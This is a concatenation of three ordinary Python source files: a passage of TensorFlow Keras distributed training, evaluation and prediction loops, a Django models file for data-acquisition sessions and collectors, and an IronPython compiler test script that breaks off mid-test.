with current_strategy.scope():
# Create train ops on each of the devices when we call
# `_per_device_train_function`.
(grouped_inputs, grouped_outputs, grouped_updates,
grouped_session_args) = current_strategy.call_for_each_tower(
_per_device_train_function, model._grouped_model)
# Unwrap all the per device values returned from `call_for_each_tower`.
# Unwrapping per device values gives you a list of values that can be
# used to construct a new train function that is composed of update ops on
# all the devices over which the model is distributed.
(all_inputs, all_outputs, all_updates,
all_session_args) = distributed_training_utils.unwrap_values(
current_strategy, grouped_inputs, grouped_outputs,
grouped_updates, grouped_session_args, with_loss_tensor=True)
# Dataset inputs and targets are also per devices values that need to be
# unwrapped.
dataset_inputs = distributed_training_utils.flatten_perdevice_values(
current_strategy, inputs)
dataset_targets = distributed_training_utils.flatten_perdevice_values(
current_strategy, targets)
# Create a train function that is composed of all the parameters above.
distributed_train_function = K.Function(
all_inputs, all_outputs,
updates=all_updates,
name='distributed_train_function',
**all_session_args)
# We need to set sample_weights to None since there are sample weight
# placeholders that are created with default values.
sample_weights = [None for _ in range(len(model.outputs) *
current_strategy.num_towers)]
if model.uses_learning_phase and not isinstance(K.learning_phase(), int):
ins = dataset_inputs + dataset_targets + sample_weights + [1]
else:
ins = dataset_inputs + dataset_targets
do_validation = False
if validation_steps:
do_validation = True
# Copy the weights from the original model to each of the replicated models.
orig_model_weights = model.get_weights()
with current_strategy.scope():
distributed_model = current_strategy.unwrap(model._grouped_model)[0]
distributed_training_utils.set_weights(
current_strategy, distributed_model, orig_model_weights)
callbacks = cbks.configure_callbacks(
callbacks,
model,
do_validation=do_validation,
val_inputs=None,
val_targets=None,
epochs=epochs,
steps_per_epoch=steps_per_epoch,
verbose=verbose)
out_labels = model.metrics_names or []
callbacks.on_train_begin()
assert steps_per_epoch is not None
for epoch in range(initial_epoch, epochs):
callbacks.on_epoch_begin(epoch)
epoch_logs = {}
for step_index in range(steps_per_epoch):
batch_logs = {'batch': step_index, 'size': 1}
callbacks.on_batch_begin(step_index, batch_logs)
try:
outs = distributed_train_function(ins)
except errors.OutOfRangeError:
logging.warning('Your dataset iterator ran out of data; '
'interrupting training. Make sure that your dataset '
'can generate at least `steps_per_epoch * epochs` '
'batches (in this case, %d batches).' %
steps_per_epoch * epochs)
break
if not isinstance(outs, list):
outs = [outs]
outs = _aggregate_metrics_across_towers(
current_strategy.num_towers, out_labels, outs)
for l, o in zip(out_labels, outs):
batch_logs[l] = o
callbacks.on_batch_end(step_index, batch_logs)
if callbacks.model.stop_training:
break
if do_validation:
val_outs = test_loop(
model,
val_iterator,
steps=validation_steps,
verbose=0)
if not isinstance(val_outs, list):
val_outs = [val_outs]
# Same labels assumed.
for l, o in zip(out_labels, val_outs):
epoch_logs['val_' + l] = o
callbacks.on_epoch_end(epoch, epoch_logs)
if callbacks.model.stop_training:
break
callbacks.on_train_end()
# Copy the weights back from the replicated model to the original model.
with current_strategy.scope():
updated_weights = current_strategy.unwrap(
model._grouped_model)[0].get_weights()
model.set_weights(updated_weights)
return model.history
def _experimental_fit_loop(
model,
iterator,
epochs=100,
verbose=1,
callbacks=None,
initial_epoch=0,
steps_per_epoch=None):
"""Fit loop for training with TPU DistributionStrategy.
Arguments:
model: Keras Model instance.
iterator: Iterator that returns inputs and targets
epochs: Number of times to iterate over the data
verbose: Integer, Verbosity mode, 0, 1 or 2
callbacks: List of callbacks to be called during training
initial_epoch: Epoch at which to start training
(useful for resuming a previous training run)
steps_per_epoch: Total number of steps (batches of samples)
before declaring one epoch finished and starting the
next epoch. Ignored with the default value of `None`.
Returns:
Returns `None`.
Raises:
ValueError: in case of invalid arguments.
"""
current_strategy = model._distribution_strategy
# TODO(priyag): Add validation that shapes are fully defined for TPU case.
K.get_session().run(current_strategy.initialize())
def _per_device_train_function(model):
model._make_train_function()
return (model.train_function.inputs,
model.train_function.outputs,
model.train_function.updates_op,
model.train_function.session_kwargs)
# TODO(priyag, sourabhbajaj): This should likely not be hardcoded here.
K.set_learning_phase(1)
def step_fn(ctx, inputs, targets):
"""Clones the model and calls make_train_function."""
# TODO(priyag, sourabhbajaj): The model gets cloned every time
# fit/test/predict is called. We should look into caching this keyed on
# input shapes.
clone_model_on_towers(
model,
current_strategy,
make_callback_model=True,
inputs=inputs,
targets=targets)
(grouped_inputs, grouped_outputs, grouped_updates,
grouped_session_args) = current_strategy.call_for_each_tower(
_per_device_train_function, model._grouped_model)
(all_inputs, all_outputs, all_updates,
all_session_args) = distributed_training_utils.unwrap_values(
current_strategy, grouped_inputs, grouped_outputs,
grouped_updates, grouped_session_args)
combined_fn = K.Function(
all_inputs, all_outputs,
updates=all_updates,
name='distributed_train_function',
**all_session_args)
out_labels = model.metrics_names or []
for label, output in zip(out_labels, combined_fn.outputs):
if label == 'loss':
aggregation = distribute_lib.get_loss_reduction()
else:
# We aggregate all other metrics using mean for now. This is temporary
# workaround until new metrics are in place.
aggregation = variable_scope.VariableAggregation.MEAN
ctx.set_last_step_output(label, output, aggregation)
# TODO(priyag, sourabhbajaj): Ignoring these things from the combined_fn:
# feed_dict, session kwargs, run options, run_metadata for now. These should
# be handled appropriately
return combined_fn.updates_op
# Add initial dummy values for loss and other metric tensors.
initial_loop_values = {}
initial_loop_values['loss'] = constant_op.constant(1e7)
for name, tensor in zip(model.metrics_names[1:], model.metrics_tensors):
initial_loop_values[name] = array_ops.zeros(tensor.shape, tensor.dtype)
with current_strategy.scope():
# TODO(priyag, sourabhbajaj): Adjust steps_per_run appropriately based on
# steps_per_epoch and number of epochs.
ctx = current_strategy.run_steps_on_dataset(
step_fn, iterator, iterations=current_strategy.steps_per_run,
initial_loop_values=initial_loop_values)
train_op = ctx.run_op
output_tensors = ctx.last_step_outputs
# Copy the weights from the original model to each of the replicated models.
orig_model_weights = model.get_weights()
with current_strategy.scope():
distributed_model = current_strategy.unwrap(model._grouped_model)[0]
distributed_training_utils.set_weights(
current_strategy, distributed_model, orig_model_weights)
assert steps_per_epoch is not None
# TODO(sourabhbajaj): Convert this into a proper validation function
if callbacks:
raise NotImplementedError(
'Callbacks are not supported with TPUStrategy right now.')
callbacks = cbks.configure_callbacks(
callbacks,
model,
do_validation=False,
val_inputs=None,
val_targets=None,
epochs=epochs,
steps_per_epoch=steps_per_epoch,
verbose=verbose)
# TODO(priyag, sourabhbajaj): Add callbacks support for per step callback
# TODO(priyag, sourabhbajaj): Fix the number of steps run with steps_per_run
# TODO(priyag, sourabhbajaj): Add validation.
callbacks.on_train_begin()
for epoch in range(initial_epoch, epochs):
callbacks.on_epoch_begin(epoch)
epoch_logs = {}
for step_index in range(0, steps_per_epoch, current_strategy.steps_per_run):
# TODO(sourabhbajaj): Replace size with a combination of steps_per_run
# and batch_size
batch_logs = {'batch': step_index, 'size': 1}
callbacks.on_batch_begin(step_index, batch_logs)
try:
_, outputs = K.get_session().run([train_op, output_tensors])
except errors.OutOfRangeError:
logging.warning('Your dataset iterator ran out of data; '
'interrupting training. Make sure that your dataset '
'can generate at least `steps_per_epoch * epochs` '
'batches (in this case, %d batches).' %
steps_per_epoch * epochs)
break
batch_logs.update(outputs)
callbacks.on_batch_end(step_index, batch_logs)
if callbacks.model.stop_training:
break
callbacks.on_epoch_end(epoch, epoch_logs)
if callbacks.model.stop_training:
break
callbacks.on_train_end()
# Copy the weights back from the replicated model to the original model.
with current_strategy.scope():
updated_weights = current_strategy.unwrap(
model._grouped_model)[0].get_weights()
model.set_weights(updated_weights)
K.get_session().run(current_strategy.finalize())
return model.history
def test_loop(model, iterator, verbose=0, steps=None):
"""Test loop for evaluating with DistributionStrategy.
Arguments:
model: Keras Model instance.
iterator: Iterator for input data.
verbose: Integer, Verbosity mode 0 or 1.
steps: Total number of steps (batches of samples)
before declaring predictions finished.
Ignored with the default value of `None`.
Returns:
Scalar loss (if the model has a single output and no metrics)
or list of scalars (if the model has multiple outputs
and/or metrics). The attribute `model.metrics_names` will give you
the display labels for the outputs.
"""
current_strategy = model._distribution_strategy
# TODO(priyag, sourabhbajaj): Remove this when the codepaths are merged.
if current_strategy.__class__.__name__ == 'TPUStrategy':
return _experimental_test_loop(model, iterator, verbose, steps)
if not model._grouped_model:
clone_model_on_towers(model, current_strategy)
def _per_device_test_function(model):
model._make_test_function()
return (model.test_function.inputs,
model.test_function.outputs,
model.test_function.updates_op,
model.test_function.session_kwargs)
inputs, targets = _get_input_from_iterator(iterator, model)
with current_strategy.scope():
(grouped_inputs, grouped_outputs, grouped_updates,
grouped_session_args) = current_strategy.call_for_each_tower(
_per_device_test_function, model._grouped_model)
(all_inputs, all_outputs, all_updates,
all_session_args) = distributed_training_utils.unwrap_values(
current_strategy, grouped_inputs, grouped_outputs, grouped_updates,
grouped_session_args, with_loss_tensor=True)
dataset_inputs = distributed_training_utils.flatten_perdevice_values(
current_strategy, inputs)
dataset_targets = distributed_training_utils.flatten_perdevice_values(
current_strategy, targets)
distributed_test_function = K.Function(
all_inputs, all_outputs,
updates=all_updates,
name='distributed_test_function',
**all_session_args)
# We need to set sample_weights to None since there are sample weight
# placeholders that are created with default values.
sample_weights = [None for _ in range(len(model.outputs) *
current_strategy.num_towers)]
if model.uses_learning_phase and not isinstance(K.learning_phase(), int):
ins = dataset_inputs + dataset_targets + sample_weights + [0]
else:
ins = dataset_inputs + dataset_targets
outs = []
if verbose == 1:
progbar = Progbar(target=steps)
# Copy the weights from the original model to each of the replicated models.
orig_model_weights = model.get_weights()
with current_strategy.scope():
distributed_model = current_strategy.unwrap(model._grouped_model)[0]
distributed_training_utils.set_weights(
current_strategy, distributed_model, orig_model_weights)
assert steps is not None
for step in range(steps):
batch_outs = distributed_test_function(ins)
batch_outs = _aggregate_metrics_across_towers(
current_strategy.num_towers, model.metrics_names, batch_outs)
if isinstance(batch_outs, list):
if step == 0:
outs = [0.] * len(batch_outs)
for i, batch_out in enumerate(batch_outs):
outs[i] += batch_out
else:
if step == 0:
outs.append(0.)
outs[0] += batch_outs
if verbose >= 1:
progbar.update(step + 1)
for i in range(len(outs)):
outs[i] /= steps
if len(outs) == 1:
return outs[0]
return outs
def _experimental_test_loop(model, iterator, verbose=0, steps=None):
"""Test loop for evaluating with TPU DistributionStrategy.
Arguments:
model: Keras Model instance.
iterator: Iterator for input data.
verbose: Integer, Verbosity mode 0 or 1.
steps: Total number of steps (batches of samples)
before declaring predictions finished.
Ignored with the default value of `None`.
Returns:
Scalar loss (if the model has a single output and no metrics)
or list of scalars (if the model has multiple outputs
and/or metrics). The attribute `model.metrics_names` will give you
the display labels for the outputs.
"""
current_strategy = model._distribution_strategy
K.get_session().run(current_strategy.initialize())
def _per_device_test_function(model):
model._make_test_function()
return (model.test_function.inputs,
model.test_function.outputs,
model.test_function.updates_op,
model.test_function.session_kwargs)
# TODO(priyag, sourabhbajaj): This should likely not be hardcoded here.
K.set_learning_phase(0)
def step_fn(ctx, inputs, targets):
"""Clones the model and calls make_test_function."""
# TODO(priyag, sourabhbajaj): The model gets cloned every time
# fit/test/predict is called. We should look into caching this keyed on
# input shapes.
clone_model_on_towers(
model,
current_strategy,
make_callback_model=False,
inputs=inputs,
targets=targets)
(grouped_inputs, grouped_outputs, grouped_updates,
grouped_session_args) = current_strategy.call_for_each_tower(
_per_device_test_function, model._grouped_model)
(all_inputs, all_outputs, all_updates,
all_session_args) = distributed_training_utils.unwrap_values(
current_strategy, grouped_inputs, grouped_outputs, grouped_updates,
grouped_session_args)
combined_fn = K.Function(
all_inputs, all_outputs,
updates=all_updates,
name='distributed_test_function',
**all_session_args)
for label, output in zip(model.metrics_names, combined_fn.outputs):
if label == 'loss':
aggregation = distribute_lib.get_loss_reduction()
else:
# We aggregate all other metrics using mean for now. This is temporary
# workaround until new metrics are in place.
aggregation = variable_scope.VariableAggregation.MEAN
ctx.set_last_step_output(label, output, aggregation)
return combined_fn.updates_op
# Add initial dummy values for loss and other metric tensors.
initial_loop_values = {}
initial_loop_values['loss'] = constant_op.constant(1e7)
for name, tensor in zip(model.metrics_names[1:], model.metrics_tensors):
initial_loop_values[name] = array_ops.zeros(tensor.shape, tensor.dtype)
with current_strategy.scope():
# TODO(priyag): Use steps_per_run when we use new metrics as they will
# allow handling metric computation at each step using variables.
ctx = current_strategy.run_steps_on_dataset(
step_fn, iterator, iterations=1,
initial_loop_values=initial_loop_values)
test_op = ctx.run_op
output_tensors = ctx.last_step_outputs
if verbose == 1:
progbar = Progbar(target=steps)
# Copy the weights from the original model to each of the replicated models.
orig_model_weights = model.get_weights()
with current_strategy.scope():
distributed_model = current_strategy.unwrap(model._grouped_model)[0]
distributed_training_utils.set_weights(
current_strategy, distributed_model, orig_model_weights)
assert steps is not None
outs = [0.] * len(model.metrics_names)
for step in range(steps):
_, batch_outs = K.get_session().run([test_op, output_tensors])
for i, label in enumerate(model.metrics_names):
outs[i] += batch_outs[label]
if verbose >= 1:
progbar.update(step + 1)
for i in range(len(outs)):
outs[i] /= (steps)
K.get_session().run(current_strategy.finalize())
if len(outs) == 1:
return outs[0]
return outs
def predict_loop(model, iterator, verbose=0, steps=None):
"""Predict loop for predicting with DistributionStrategy.
Arguments:
model: Keras Model instance.
iterator: Iterator for input data.
verbose: Integer, Verbosity mode 0 or 1.
steps: Total number of steps (batches of samples)
before declaring `_predict_loop` finished.
Ignored with the default value of `None`.
Returns:
Array of predictions (if the model has a single output)
or list of arrays of predictions
(if the model has multiple outputs).
"""
current_strategy = model._distribution_strategy
# TODO(priyag, sourabhbajaj): Remove this when the codepaths are merged.
if current_strategy.__class__.__name__ == 'TPUStrategy':
return _experimental_predict_loop(model, iterator, verbose, steps)
if not model._grouped_model:
clone_model_on_towers(model, current_strategy)
def _per_device_predict_function(model):
model._make_predict_function()
return (model.predict_function.inputs,
model.predict_function.outputs,
model.predict_function.updates_op,
model.predict_function.session_kwargs)
inputs, _ = _get_input_from_iterator(iterator, model)
with current_strategy.scope():
(grouped_inputs, grouped_outputs, grouped_updates,
grouped_session_args) = current_strategy.call_for_each_tower(
_per_device_predict_function, model._grouped_model)
(all_inputs, all_outputs, all_updates,
all_session_args) = distributed_training_utils.unwrap_values(
current_strategy, grouped_inputs, grouped_outputs, grouped_updates,
grouped_session_args)
dataset_inputs = distributed_training_utils.flatten_perdevice_values(
current_strategy, inputs)
distributed_predict_function = K.Function(
all_inputs, all_outputs,
updates=all_updates,
name='distributed_predict_function',
**all_session_args)
if model.uses_learning_phase and not isinstance(K.learning_phase(), int):
ins = dataset_inputs + [0]
else:
ins = dataset_inputs
if verbose == 1:
progbar = Progbar(target=steps)
# Copy the weights from the original model to each of the replicated models.
orig_model_weights = model.get_weights()
with current_strategy.scope():
distributed_model = current_strategy.unwrap(model._grouped_model)[0]
distributed_training_utils.set_weights(
current_strategy, distributed_model, orig_model_weights)
if steps is not None:
# Since we do not know how many samples we will see, we cannot pre-allocate
# the returned Numpy arrays. Instead, we store one array per batch seen
# and concatenate them upon returning.
unconcatenated_outs = []
for step in range(steps):
batch_outs = distributed_predict_function(ins)
if not isinstance(batch_outs, list):
batch_outs = [batch_outs]
if step == 0:
for _ in batch_outs:
unconcatenated_outs.append([])
# TODO(anjalisridhar): Should combine the outputs from multiple towers
# correctly here.
for i, batch_out in enumerate(batch_outs):
unconcatenated_outs[i].append(batch_out)
if verbose >= 1:
progbar.update(step + 1)
if len(unconcatenated_outs) == 1:
return np.concatenate(unconcatenated_outs[0], axis=0)
return [
np.concatenate(unconcatenated_outs[i], axis=0)
for i in range(len(unconcatenated_outs))
]
def _experimental_predict_loop(model, iterator, verbose=0, steps=None):
"""Predict loop for predicting with TPU DistributionStrategy.
Arguments:
model: Keras Model instance.
iterator: Iterator for input data.
verbose: Integer, Verbosity mode 0 or 1.
steps: Total number of steps (batches of samples)
before declaring `_predict_loop` finished.
Ignored with the default value of `None`.
Returns:
Array of predictions (if the model has a single output)
or list of arrays of predictions
(if the model has multiple outputs).
"""
current_strategy = model._distribution_strategy
K.get_session().run(current_strategy.initialize())
# TODO(priyag, sourabhbajaj): This should likely not be hardcoded here.
K.set_learning_phase(0)
def _per_device_predict_function(model):
model._make_predict_function()
return (model.predict_function.inputs,
model.predict_function.outputs,
model.predict_function.updates_op,
model.predict_function.session_kwargs)
def step_fn(ctx, inputs, targets):
"""Clones the model and calls make_predict_function."""
# TODO(anjalisridhar): Support predict input correctly as it will not
# contain targets, only inputs.
del targets
# TODO(priyag, sourabhbajaj): The model gets cloned every time
# fit/test/predict is called. We should look into caching this keyed on
# input shapes.
clone_model_on_towers(
model,
current_strategy,
make_callback_model=False,
inputs=inputs)
(grouped_inputs, grouped_outputs, grouped_updates,
grouped_session_args) = current_strategy.call_for_each_tower(
_per_device_predict_function, model._grouped_model)
(all_inputs, all_outputs, all_updates,
all_session_args) = distributed_training_utils.unwrap_values(
current_strategy, grouped_inputs, grouped_outputs, grouped_updates,
grouped_session_args)
combined_fn = K.Function(
all_inputs, all_outputs,
updates=all_updates,
name='distributed_predict_function',
**all_session_args)
for label, output in zip(model.output_names, combined_fn.outputs):
ctx.set_last_step_output(label, output)
return combined_fn.updates_op
# Add initial dummy values for outputs.
initial_loop_values = {}
batch_dimension = distributed_training_utils.get_batch_dimension(iterator)
for name, tensor in zip(model.output_names, model.outputs):
# TODO(priyag): This is a workaround as we do not know the batch dimension
# of the model's output at this point.
tensor.shape.dims = [batch_dimension] + tensor.shape.dims[1:]
initial_loop_values[name] = array_ops.zeros(tensor.shape, tensor.dtype)
with current_strategy.scope():
# TODO(priyag, sourabhbajaj): Support steps_per_run if/when we add outfeed.
ctx = current_strategy.run_steps_on_dataset(
step_fn, iterator, iterations=1,
initial_loop_values=initial_loop_values)
predict_op = ctx.run_op
output_tensors = ctx.last_step_outputs
if verbose == 1:
progbar = Progbar(target=steps)
# Copy the weights from the original model to each of the replicated models.
orig_model_weights = model.get_weights()
with current_strategy.scope():
distributed_model = current_strategy.unwrap(model._grouped_model)[0]
distributed_training_utils.set_weights(
current_strategy, distributed_model, orig_model_weights)
assert steps is not None
# Since we do not know how many samples we will see, we cannot pre-allocate
# the returned Numpy arrays. Instead, we store one array per batch seen
# and concatenate them upon returning.
unconcatenated_outs = [[] for _ in model.outputs]
for step in range(steps):
_, batch_outs = K.get_session().run([predict_op, output_tensors])
# TODO(priyag): maybe need to unwrap the outputs first for MirroredStrategy.
for i, label in enumerate(model.output_names):
unconcatenated_outs[i].extend(batch_outs[label])
if verbose >= 1:
progbar.update(step + 1)
K.get_session().run(current_strategy.finalize())
if len(unconcatenated_outs) == 1:
return np.concatenate(unconcatenated_outs[0], axis=0)
return [
np.concatenate(unconcatenated_outs[i], axis=0)
for i in range(len(unconcatenated_outs))
]
def _clone_and_build_model(model, inputs=None, targets=None):
"""Clone and build the given keras_model."""
# We need to set the import here since we run into a circular dependency
# error.
from tensorflow.python.keras import models # pylint: disable=g-import-not-at-top
cloned_model = models.clone_model(model, input_tensors=inputs)
# Compile and build model.
if isinstance(model.optimizer, optimizers.TFOptimizer):
optimizer = model.optimizer
else:
optimizer_config = model.optimizer.get_config()
optimizer = model.optimizer.__class__.from_config(optimizer_config)
# TODO(priyag): Is there a cleaner way to do this? The API doc suggests a
# single tensor should be OK but it throws an error in that case.
if (targets is not None and not isinstance(targets, list) and
not isinstance(targets, dict)):
targets = [targets]
cloned_model.compile(
optimizer,
model.loss,
metrics=model.metrics,
loss_weights=model.loss_weights,
sample_weight_mode=model.sample_weight_mode,
weighted_metrics=model.weighted_metrics,
target_tensors=targets)
return cloned_model
def clone_model_on_towers(
model, strategy, make_callback_model=False, inputs=None, targets=None):
"""Create a cloned model on each tower."""
with strategy.scope():
model._grouped_model = strategy.call_for_each_tower(
_clone_and_build_model, model, inputs, targets)
if make_callback_model:
model._make_callback_model()
def _aggregate_metrics_across_towers(num_devices, out_labels, outs):
"""Aggregate metrics values across all towers.
When using `MirroredStrategy`, the number of towers is equal to the
number of devices over which training is distributed. This may not always be
the case.
Args:
num_devices: Number of devices over which the model is being distributed.
out_labels: The list of metric names passed to `compile`.
outs: The output from all the towers.
Returns:
The average value of each metric across the towers.
"""
# TODO(anjalisridhar): Temporary workaround for aggregating metrics
# across towers. Replace with the new metrics module eventually.
merged_output = []
# The first output is the total loss.
merged_output.append(outs[0])
current_index = 1
# Each label in `out_labels` corresponds to one set of metrics. The
# number of metric values corresponds to the number of devices. We
# currently take the mean of the values.
for _ in out_labels[1:]:
m = np.mean(outs[current_index:current_index + num_devices])
merged_output.append(m)
current_index += num_devices
return merged_output
def _get_input_from_iterator(iterator, model):
"""Get elements from the iterator and verify the input shape and type."""
next_element = iterator.get_next()
if isinstance(next_element, tuple):
x, y = next_element
else:
x = next_element
y = None
# Validate that all the elements in x and y are of the same type and shape.
# We can then pass the first element of x and y to `_standardize_weights`
# below and be confident of the output.
x_values, y_values = distributed_training_utils.\
validate_distributed_dataset_inputs(model._distribution_strategy, x, y)
# TODO(sourabhbajaj): Add support for sample weights in distribution
# strategy.
model._standardize_weights(x_values, y_values)
return x, y
|
|
import os
import base64
from django.db import models
from django.conf import settings
from django.utils.translation import ugettext_lazy as _
from django.core.files.storage import FileSystemStorage
from django.utils.timezone import now
from django.core.urlresolvers import reverse
try:
from PIL import Image
except ImportError:
Image = None
from polymorphic import PolymorphicModel
from csat.acquisition import get_collector
graph_fs = FileSystemStorage(location=settings.GRAPHS_ROOT)
logs_fs = FileSystemStorage(location=settings.EXECUTION_LOGS_ROOT)
class AcquisitionSessionConfig(models.Model):
CONFIGURED, RUNNING, COMPLETED, FAILED = range(4)
STATUSES = {
CONFIGURED: _('Configured'),
RUNNING: _('Running'),
COMPLETED: _('Completed'),
FAILED: _('Completed with errors'),
}
name = models.CharField(
max_length=64,
help_text=_('Name this acquisition setup. Choose something you can '
'easily remember'))
description = models.TextField(
blank=True,
help_text=_('Describe the setup, e.g. which project are you capturing '
'data for, from which sources,...'))
temporary = models.BooleanField(default=False)
created = models.DateTimeField(auto_now_add=True)
started = models.DateTimeField(null=True, blank=True)
completed = models.DateTimeField(null=True, blank=True)
thumbnail_background = models.CharField(null=True, blank=True,
max_length=7)
def __unicode__(self):
return self.name
def get_graph_upload_path(self, filename):
return '{}/merged.graphml'.format(self.id)
graph = models.FileField(upload_to=get_graph_upload_path, storage=graph_fs,
blank=True, null=True)
def get_thumbnail_upload_path(self, filename):
return 'graph-thumbnails/{}.png'.format(self.id)
thumbnail = models.ImageField(upload_to=get_thumbnail_upload_path,
blank=True, null=True)
def get_thumbnail_url(self):
return reverse('csat:acquisition:session-thumbnail', kwargs={
'pk': self.pk})
def get_graph_url(self, raw=True):
fmt = 'graphml' if raw else 'html'
return reverse('csat:acquisition:session-view-results', kwargs={
'session_pk': self.pk,
'format': fmt,
})
@property
def status(self):
if self.started is None:
return self.CONFIGURED
if self.completed is None:
return self.RUNNING
if self.collectors.filter(status=DataCollectorConfig.FAILED).count():
return self.FAILED
return self.COMPLETED
def set_completed(self, save=True):
self.completed = now()
if save:
self.save()
def get_absolute_url(self):
return reverse('csat:acquisition:session', kwargs={'pk': self.pk})
def get_thumbnail_background(self):
if not Image or not self.thumbnail:
return False
with self.thumbnail as fh:
image = Image.open(fh)
image = image.resize((200, 200)).convert('RGB')
w, h = image.size
image = image.crop((0, h - 40, w, h - 5))
image = image.convert('P', palette=Image.ADAPTIVE, colors=3)
image.putalpha(0)
colors = image.getcolors(w * h)
colors = sorted(colors, reverse=True)
color = colors[0][1]
return '#{:02x}{:02x}{:02x}'.format(*color)
def has_dark_thumbnail(self):
color = self.thumbnail_background
if not color:
return False
color = color[1:3], color[3:5], color[5:]
color = [int(n, 16) for n in color]
brightness = sum(color) / 3.0 / 255
return brightness < 0.5
dark_thumbnail = property(has_dark_thumbnail)
class Meta:
ordering = ['created']
class DataCollectorConfig(PolymorphicModel):
READY, RUNNING, FAILED, COMPLETED = range(4)
STATUS_CHOICES = (
(READY, _('Ready to run')),
(RUNNING, _('Running')),
(FAILED, _('Failed')),
(COMPLETED, _('Completed')),
)
configurator = models.CharField(max_length=44)
session_config = models.ForeignKey(AcquisitionSessionConfig,
related_name='collectors')
started = models.DateTimeField(null=True, blank=True)
completed = models.DateTimeField(null=True, blank=True)
running_instance_id = models.CharField(max_length=128,
null=True, blank=True)
result_id = models.CharField(max_length=64, blank=True, null=True)
status = models.PositiveSmallIntegerField(
choices=STATUS_CHOICES, default=READY)
def __unicode__(self):
return u'{} / {}'.format(self.session_config, self.name)
@property
def name(self):
return self.get_collector().name
def get_graph_upload_path(self, filename):
return '{}/{}-{}.graphml'.format(self.session_config.pk, self.pk,
self.configurator)
graph = models.FileField(upload_to=get_graph_upload_path, storage=graph_fs,
blank=True,
null=True)
#schema=graphml.get_schema_path(),
def get_log_upload_path(self, filename):
return '{}/{}.log'.format(self.session_config.pk, self.pk)
output = models.FileField(upload_to=get_log_upload_path, storage=logs_fs,
blank=True, null=True)
def get_graph_url(self, raw=True):
fmt = 'graphml' if raw else 'html'
return reverse('csat:acquisition:collector-view-results', kwargs={
'session_pk': self.session_config.pk,
'collector_pk': self.pk,
'format': fmt,
})
def get_log_url(self, raw=True):
fmt = 'txt' if raw else 'html'
return reverse('csat:acquisition:collector-view-log', kwargs={
'session_pk': self.session_config.pk,
'collector_pk': self.pk,
'format': fmt,
})
def set_running(self, save=True):
if self.status != DataCollectorConfig.READY:
raise RuntimeError('Collector in invalid state: {}'.format(
self.status))
self.status = DataCollectorConfig.RUNNING
self.started = now()
if save:
self.save()
def set_failed(self, save=True):
if self.status not in (DataCollectorConfig.RUNNING,
DataCollectorConfig.READY):
raise RuntimeError('Collector in invalid state: {}'.format(
self.status))
if not self.started:
self.started = now()
self.status = DataCollectorConfig.FAILED
self.completed = now()
if save:
self.save()
def set_completed(self, save=True):
if self.status not in (DataCollectorConfig.RUNNING,
DataCollectorConfig.READY):
raise RuntimeError('Collector in invalid state: {}'.format(
self.status))
if not self.started:
self.started = now()
self.status = DataCollectorConfig.COMPLETED
self.completed = now()
if save:
self.save()
def create_postback_url(self, save=True):
if self.result_id:
raise ValueError('Postback URL already defined')
if self.status in (DataCollectorConfig.FAILED,
DataCollectorConfig.COMPLETED):
raise RuntimeError('Collector in invalid state: {}'.format(
self.status))
self.result_id = base64.urlsafe_b64encode(os.urandom(48))
if save:
self.save()
return self.get_postback_url()
def get_postback_url(self):
if not self.result_id:
raise ValueError('Postback URL not yet defined')
return reverse('csat:acquisition:collector-upload-results', kwargs={
'result_id': self.result_id,
})
def get_collector(self):
return get_collector(self.configurator)
|
|
# Licensed to the .NET Foundation under one or more agreements.
# The .NET Foundation licenses this file to you under the Apache 2.0 License.
# See the LICENSE file in the project root for more information.
##
## Testing IronPython Compiler
##
from iptest.assert_util import *
skiptest("win32")
from iptest.file_util import *
from iptest.process_util import *
import sys
import os
import System
from System.Collections.Generic import List
remove_ironpython_dlls(testpath.public_testdir)
load_iron_python_dll()
import IronPython
if False: #Needs to be updated or removed for DLR
from IronPython.Hosting import PythonCompiler
load_iron_python_test()
def CompileAsDll(fileName, assemblyName):
sources = List[str]()
sources.Add(fileName)
pc = PythonCompiler(sources, assemblyName)
pc.TargetKind = System.Reflection.Emit.PEFileKinds.Dll
pc.Compile()
def CompileOneFileAsConsoleApp1(fileName, assemblyName, setMainFile) :
sources = List[str]()
sources.Add(fileName)
pc = PythonCompiler(sources, assemblyName)
if setMainFile:
pc.MainFile = fileName
pc.Compile()
def CompileOneFileAsConsoleApp2(fileName, assemblyName):
sources = List[str]()
sources.Add(fileName)
pc = PythonCompiler(sources, assemblyName)
pc.MainFile = "NotExistFile"
pc.Compile()
def CompileTwoFilesAsConsoleApp(fileName1, fileName2, assemblyName, setMainFile):
sources = List[str]()
sources.Add(fileName1)
sources.Add(fileName2)
pc = PythonCompiler(sources, assemblyName)
if (setMainFile):
pc.MainFile = fileName1
pc.Compile()
def UsingReference(fileName, typeName, assemblyName):
sources = List[str]()
sources.Add(fileName)
pc = PythonCompiler(sources, assemblyName)
pc.MainFile = fileName
refAsms = List[str]()
refAsms.Add(System.Type.GetType(typeName).Assembly.FullName)
pc.ReferencedAssemblies = refAsms
pc.Compile()
def CheckIncludeDebugInformation(fileName, assemblyName, include):
sources = List[str]()
sources.Add(fileName)
pc = PythonCompiler(sources, assemblyName)
pc.IncludeDebugInformation = include
pc.Compile()
def FileExists(file):
return System.IO.File.Exists(file)
def DeleteFile(file):
for i in range(5):
try:
System.IO.File.Delete(file)
break
except:
System.Threading.Thread.Sleep(1000)
def FileRemoval(*files):
for file in files:
DeleteFile(file)
def GetFullPath(file):
return System.IO.Path.GetFullPath(file).ToLower()
def RunPythonExe(file, *args):
fullpath = GetFullPath(file)
temppath = System.IO.Path.Combine(sys.prefix, System.IO.FileInfo(fullpath).Name).ToLower()
if (fullpath != temppath):
System.IO.File.Copy(fullpath, temppath, True)
realargs = [temppath]
realargs.extend(args)
try:
retval = os.spawnv(0, temppath, realargs)
except:
retval = 1
# hack
if (fullpath != temppath):
DeleteFile(temppath)
Assert(not retval)
## compile as dll
source, assembly, pdbfile = "tempFile1.tpy", "tempFile1.dll", "tempFile1.pdb"
write_to_file(source, '''
class B:
def M1(self):
return 20
''')
@disabled("Needs to be updated or removed for DLR")
def test_sanity():
FileRemoval(assembly, pdbfile);
CompileAsDll(source, assembly)
Assert(FileExists(assembly))
Assert(FileExists(pdbfile))
@disabled("Needs to be updated or removed for DLR")
def test_one_source_consoleapp():
## compile as exe
## if only one source file, you do not necessarily specify the main file
source, assembly, pdbfile = "tempFile1.tpy", "tempFile1.exe", "tempFile1.pdb"
FileRemoval(assembly, pdbfile);
CompileOneFileAsConsoleApp1(source, assembly, True)
Assert(FileExists(assembly))
Assert(FileExists(pdbfile))
FileRemoval(assembly, pdbfile);
CompileOneFileAsConsoleApp1(source, assembly, False)
Assert(FileExists(assembly))
